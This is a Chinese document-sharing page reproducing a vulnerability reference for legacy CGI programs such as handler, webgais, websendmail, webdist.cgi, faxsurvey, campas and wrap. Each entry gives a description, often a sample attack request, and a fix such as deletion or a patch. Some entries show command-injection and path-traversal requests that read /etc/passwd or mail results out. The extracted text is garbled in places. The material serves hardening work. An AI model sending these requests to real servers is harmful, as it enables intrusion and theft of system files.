CGI 安全漏洞资料速查文档格式.docx

上传人:b****5 文档编号:18211495 上传时间:2022-12-14 格式:DOCX 页数:30 大小:25.61KB
下载 相关 举报
CGI 安全漏洞资料速查文档格式.docx_第1页
第1页 / 共30页
CGI 安全漏洞资料速查文档格式.docx_第2页
第2页 / 共30页
CGI 安全漏洞资料速查文档格式.docx_第3页
第3页 / 共30页
CGI 安全漏洞资料速查文档格式.docx_第4页
第4页 / 共30页
CGI 安全漏洞资料速查文档格式.docx_第5页
第5页 / 共30页
点击查看更多>>
下载资源
资源描述

CGI 安全漏洞资料速查文档格式.docx

《CGI 安全漏洞资料速查文档格式.docx》由会员分享,可在线阅读,更多相关《CGI 安全漏洞资料速查文档格式.docx(30页珍藏版)》请在冰豆网上搜索。

CGI 安全漏洞资料速查文档格式.docx

   可以在perl.exe后面加一串指令,利用浏览器在server上执行任何

   脚本程序

perl.exe是放在任何带执行权限的web目录下都是不安全的

在web目录下移除perl.exe这个程序.

shtml.exe

如果您使用FrontPage作为您的WebServer,那么入侵者能够利用

   IUSR_用户和shtml.exe入侵您的机器,做您不希望的事

将shtml.exe从你的Web目录移走或删除

wwwboard.pl

wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击

如无必要可以删除该文件

对get_variables的子程序中的下面这段:

if($FORM{\'

followup\'

}){$followup=\"

1\"

;

@followup_num=split(/,/,$FORM{\'

});

$num_followups=@followups=@followup_num;

$last_message=pop(@followups);

$origdate=\"

$FORM{\'

origdate\'

}\"

$origname=\"

origname\'

$origsubject=\"

origsubject\'

}

替换为:

}){

$followup=\"

#WWWBoardBombPatch

#WrittenBy:

SamuelSparlingsparling@)

$fn=0;

while($fn<

$num_followups)

{

$cur_fup=@followups$fn];

$dfn=0;

foreach$fm(@followups)

if(@followups[$dfn]==@followups[$fn]&

&

$dfn!

=$fn)

error(board_bomb);

$dfn++;

$fn++;

#EndWWWBoardBombPatch

uploader.exe

如果您使用NT作为您的WebServer的操作系统,入侵者能够利用

   uploader.exe上传任何文件

将uploader.exe从你的Web目录移走或删除

bdir.htr

如果您使用NT做为您的WebServer的操作系统,而且bdir.htr存在

   于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上

   无止境的创建ODBC数据库,并生成一些可执行的文件。

将bdir.htr从你的Web目录移走或删除

Count.cgi

在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出

   错误,允许入侵者无须登录而远程执行任何指令。

将wwwcount升级到2.4或者以上

test-cgi

test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议审核cgi-bin目录下的执行程序,严格控制访问权限

删除test-cgi文件

nph-test-cgi

nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

删除nph-test-cgi文件

php.cgi

php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系

   统文件可以被入侵者读取的漏洞

建议审核cgi-bin目录,避免有不必要的程序存在

删除php.cgi程序是最好的办法

handler

IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出

   错误,允许入侵者在server上远程执行一段程序:

   80

   GET/cgi-bin/handler/whatever;

cat/etc/passwd|?

data=Download

   HTTP/1.0

删除handler文件

webgais

/cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个

   毛病使入侵者可以绕过程序的安全机制,执行系统命令:

   POST/cgi-bin/webgaisHTTP/1.0

   Content-length:

85(replacethiswiththeactuallengthof

   the\"

exploit\"

line)

   80query=\'

mail+you\\@your.host

删除webgais文件

websendmail

/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:

   POST/cgi-bin/websendmailHTTP/1.0

xxx(shouldbereplacedwiththeactual

   lengthofthestringpassedtotheserver,inthiscase

   xxx=90) receiver=;

mail+your_address\\@somewhere.org

   &

content=a

高级用户:

编辑websendmail脚本,过滤特殊字符

一般用户:

删除websendmail文件

webdist.cgi

对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点

   允许入侵者无须登录而在系统上执行任何指令:

   http:

//host/cgi-bin/webdist.cgi?

distloc=;

cat%20/etc/passwd

删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi

faxsurvey

在LinuxS.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无

   须登录就能在服务器执行指令:

http:

//joepc.linux.elsewhere.org/

   cgi-bin/faxsurvey?

/bin/cat%20/etc/passwd

删除/cgi-bin/faxsurvey文件

htmlscript

安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使

   入侵者可以查看服务器上的任何文件:

   

   ../../etc/passwd

删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到

     3.0以上

pfdisplay

在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序

   允许入侵者非法查看服务器上的文件

删除/cgi-bin/pfdisplay文件,或者打补丁,补丁可以去

     (204.94.209.1)或者下载:

     Filename:

README.patch.3018

     Algorithm#1(sum-r):

3795511README.patch.3018

     Algorithm#2(sum):

1545511README.patch.3018

     MD5checksum:

1169EB51D75E0794C64C2C1FD6211B69

patchSG0003018

016792patchSG0003018

128762patchSG0003018

BD16A53A0AE693D6E9E276EE066BDBC8

patchSG0003018.idb

013392patchSG0003018.idb

2512patchSG0003018.idb

1CB16E6A8C50BF17CD02A29C2E4D35EB

patchSG0003018.performer_tools_man

102018patchSG0003018.per-

     -former_tools_man

31448patchSG0003018.performer_t-

     -ools_man

B6B3D90FAB9B5A342397C3E5AF5A8D29

patchSG0003018.performer_tools_sw

4847418patchSG0003018.perform-

     -er_tools_sw

2817618patchSG0003018.performer_

     tools_sw

DF4E8ED8326A6A0B39F7B4D67E5FD71F

www-sql

www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保

   护的文件

最好删除www-sql文件

#ifPHPFASTCGI

     while(FCGI_Accept()>

=0)

     {

     #endif

     s=getenv(\"

REDIRECT_STATUS\"

);

     if(!

s){

     puts(\"

Content-type:

text/plain\\r\\n\\r\\nPHP/FIdetected

     aninternalerror.Pleaseinformsa@ofwhat

     youjustdid.\\n\"

     exit

(1);

     }

PATH_TRANSLATED\"

view-source

在cgi-bin目录下的view-source程序没有对输入进行安全检查,使

   入侵者可以查看服务器上的任何文件

删除/cgi-bin目录下的viewsource程序

campas

在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看

   server上的重要文件:

   Trying200.xx.xx.xx...

   C

   Escapecharacteris\'

^]\'

.

   GET/cgi-bin/campas?

%0acat%0a/etc/passwd%0a

删除/cgi-bin目录下的campas程序

aglimpse

在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登

   录而随意执行任何指令 

删除/cgi-bin目录下的aglimpse程序

AT-admin.cgi

在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允

   许普通用户完全控制整个系统

删除/cgi-bin目录下的AT-admin.cgi程序

finger

这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,

   但是如果将参数改成本机,本机上的帐号信息将暴露无遗:

   /cgi-bin/finger?

@localhost

删除/cgi-bin目录下的finger程序

webwho.pl

如果在您的Web可执行目录中有webwho.pl这个CGI脚本,那么入侵

   者将能利用他阅读启动Web的用户能读写执行的任何文件。

将webwho.pl从您的Web目录中删除或移走

w3-msql

MiniSQL软件包发行版本附带的一个CGI(w3-msql)可被用于以

   httpd的uid权限执行任意代码。

这个安全漏洞是由程序中的

scanf()函数引起的。

如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql

文件删除或移走

如果您安装了MiniSQL软件包,请您将/cgi-bin/目录下的w3-msql

     文件删除或移走,或使用以下补丁。

补丁:

------w3-msql.patch---------

410c410

scanf(\"

%s\"

boundary);

<

br>

---

<

%128s\"

>

418c418

strcat(var,buffer);

strncat(var,buffer,sizeof(buffer));

428c428

Content-Type:

buffer);

%15360s\"

NetscapeFastTrackserver2.0.1a

UnixWare7.1附带的NetscapeFastTrackserver2.0.1a存在一个远程

   缓冲区溢出漏洞。

缺省地,监听457端口的httpd通过http协议提供

   UnixWare文档。

如果向该服务器传送一个长度超过367字符的GET请

   求,会使缓冲区溢出,EIP值被覆盖将可能导致任意代码以httpd权

   限执行。

临时解决方法是关闭NetscapeFastTrack服务器

临时解决方法是关闭NetscapeFastTrack服务器。

AnyForm.cgi

位于cgi-bin目录下的AnyForm.cgi程序,是用于简单表单通过邮件

   传递响应的,但该程序对用户输入检查不彻底,可被入侵者利用,

   在server上执行任何指令.

建议升级该cgi程序,或者删除该文件

whois.cgi

在多个WebServer中带有的Whois.cgi存在溢出漏洞。

它们包括:

WhoisInternicLookup-version:

1.02

CCWhois-Version:

1.0

Matt\'

sWhois-Version:

1

  他们将使入侵者能够在您的系统上使用启动httpd用户的权限执行任

意的代码

将在您Web目录中问whois.cgi删除或移走

environ.cgi

在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi

   程序,有一个毛病允许入侵者绕过安全机制,浏览服务器上的一些

   文件。

wrap

/cgi-bin/wrap程序有两个漏洞,均允许入侵者获取服务器上文件

   的非法访问,如:

//host/cgi-bin/wrap?

/../../../../../etc

删除/cgi-bin/wrap文件

edit.pl

/cgi-bin/edit.pl有一个安全弱点,用下面这条命令就可以访问用

   户的配置情况:

 

删除/cgi-bin/edit.pl文件

service.pwd

UNix系统的

   将暴露用户密码信息

建议删除

chownrootservice.pwd chmod700service.pwd

administrators.pwd

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 求职职场 > 简历

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1